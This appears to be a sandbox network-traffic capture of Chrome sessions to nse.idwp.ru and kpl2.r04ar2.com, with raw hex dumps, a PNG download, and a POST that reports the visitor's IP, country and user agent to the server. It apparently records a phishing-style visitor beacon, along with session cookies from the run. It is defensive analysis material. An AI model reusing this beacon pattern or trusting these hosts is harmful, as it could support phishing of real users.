                                                          2024-08-27 22:11:13 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          79192.168.2.449878104.21.67.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:13 UTC419OUTGET /srsldqgbwnlyknaiuilfjcyqoKGYnePGFJAVJGZCNGFCUJYLNOCYUZRFYFVSVVQBpqvHhnoPyzuWRNahuv40 HTTP/1.1
                                                          Host: nse.idwp.ru
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:14 UTC545INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:14 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8CPWAFRmC%2B15cUfX0tW25Upt%2B5qsJm2F45pllFZw%2BWBOOYFR9H7Jo%2BKI%2BPDwB%2F4iaPINqM%2F9PUSpKS96CQ9mCIbQd1jTLR4WYA66RlTUiUVWTe1Vm7gflPqhXgC3Ww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f656c5ab30c92-EWR
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          80192.168.2.449880188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:14 UTC1147OUTGET /opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:14 UTC687INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:14 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 29796
                                                          Connection: close
                                                          Content-Disposition: inline; filename="opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYmZI4jT%2Fmf%2BLO3U%2Bsczb76v8nQMvtL%2F0wZeZ6idBr0tSEpTjVcv37Q1AJixse%2BwUbSWmo3UgAlTecuqtdFctsU4y6Z%2B2yQA1ONkYwxM4tz48YvXSvIWY%2FBEVzbFtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f656f4e05425e-EWR
                                                          2024-08-27 22:11:14 UTC682INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                          Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                          2024-08-27 22:11:14 UTC1369INData Raw: dc 53 a1 07 70 e2 f0 3e a9 9c 21 43 87 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f
                                                          Data Ascii: Sp>!C"))O>E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jl
                                                          2024-08-27 22:11:14 UTC1369INData Raw: c6 25 63 c2 4e cc b6 b2 20 50 c3 bb 33 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e
                                                          Data Ascii: %cN P3g,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~
                                                          2024-08-27 22:11:14 UTC1369INData Raw: a9 72 25 34 73 97 fc f8 22 65 f7 d3 a7 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0
                                                          Data Ascii: r%4s"e}&Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#
                                                          2024-08-27 22:11:14 UTC1369INData Raw: ae e2 e6 fd 31 97 7e d8 30 28 08 f3 e7 cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c
                                                          Data Ascii: 1~0(#Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<
                                                          2024-08-27 22:11:14 UTC1369INData Raw: 29 10 a8 11 ee 8c e8 55 82 9c b7 ca 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1
                                                          Data Ascii: )UNV37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`F
                                                          2024-08-27 22:11:14 UTC1369INData Raw: 44 ef d2 a5 51 dc 56 18 27 24 66 68 78 f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74
                                                          Data Ascii: DQV'$fhx{=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_t
                                                          2024-08-27 22:11:14 UTC1369INData Raw: 5f 70 5d 43 42 10 97 7e db dd cc cc 0c 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0
                                                          Data Ascii: _p]CB~&rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\
                                                          2024-08-27 22:11:14 UTC1369INData Raw: 30 6b 1b 89 09 13 27 72 db b7 6d a3 dd f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38
                                                          Data Ascii: 0k'rm.j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 7c fe fc 59 8a 7a e5 1a fe a8 e0 5b 15 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9
                                                          Data Ascii: |Yz[n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6g


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          81192.168.2.449879188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:14 UTC1583OUTPOST /lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          Content-Length: 251
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                          X-Requested-With: XMLHttpRequest
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://kpl2.r04ar2.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:14 UTC251OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 5a 58 25 32 42 37 4e 42 59 44 63 64 25 32 46 42 33 71 30 79 74 34 72 34 33 77 25 33 44 25 33 44 26 6d 61 69 6c 74 79 70 65 3d 30 26 74 79 70 65 3d 33 26 74 79 70 65 76 61 6c 3d 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 63 6f 75 6e 74 72 79 3d 55 6e 69 74 65 64 2b 53 74 61 74 65 73 26 75 73 65 72 61 67 65 6e 74 3d 4d 6f 7a 69 6c 6c 61 25 32 46 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 25 33 42 2b 57 69 6e 36 34 25 33 42 2b 78 36 34 29 2b 41 70 70 6c 65 57 65 62 4b 69 74 25 32 46 35 33 37 2e 33 36 2b 28 4b 48 54 4d 4c 25 32 43 2b 6c 69 6b 65 2b 47 65 63 6b 6f 29 2b 43 68 72 6f 6d 65 25 32 46 31 31 37 2e 30 2e 30 2e 30 2b 53 61 66 61 72 69 25 32 46 35 33 37 2e 33 36 26 61 70 70 6e 75 6d 3d 31
                                                          Data Ascii: pagelink=ZX%2B7NBYDcd%2FB3q0yt4r43w%3D%3D&mailtype=0&type=3&typeval=0&ip=8.46.123.33&country=United+States&useragent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F117.0.0.0+Safari%2F537.36&appnum=1
                                                          2024-08-27 22:11:14 UTC1011INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ocxDYC32%2BFF1Xc8CUWSNRMEHZsGIadoSsUvGiGvDSvVwoy9WI7HqhdfrDUh%2FC3ufOe1273KsrOzdacmYRB3o%2B8s08OCQV%2F620qnz8L2C%2FUjRbd5ZbpEZroVeM7H%2FZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IkI2T2dDNUQwOGtjZHgvV280cmFSMWc9PSIsInZhbHVlIjoibWFlWmRtNmxjclMwODU2cUkxVnBvZk5kZnhUc2dkMHlYN2hHUkRDYVVNWi9YL0pOQ095UG9zb3djaFdGcEg0NDlwS3VCU05wZ29IL2VoWGJYdWFDVEN1WjdONzB2NmFvZ2R3cG1ucGo2OHFJZGpYOGNGNm84TDkwYWw1OE9yTFMiLCJtYWMiOiIxMGExNzUyOTMxMWU3OThlNzUwZTNkZDVmNTEzYzY5MTc0MTM1MzM4YWUyMGVkN2I4MTg0NWViOWQ2MWQ2Y2U1IiwidGFnIjoiIn0%3D; expires=Wed, 28-Aug-2024 00:11:14 GMT; Max-Age=7200; path=/; secure; samesite=none
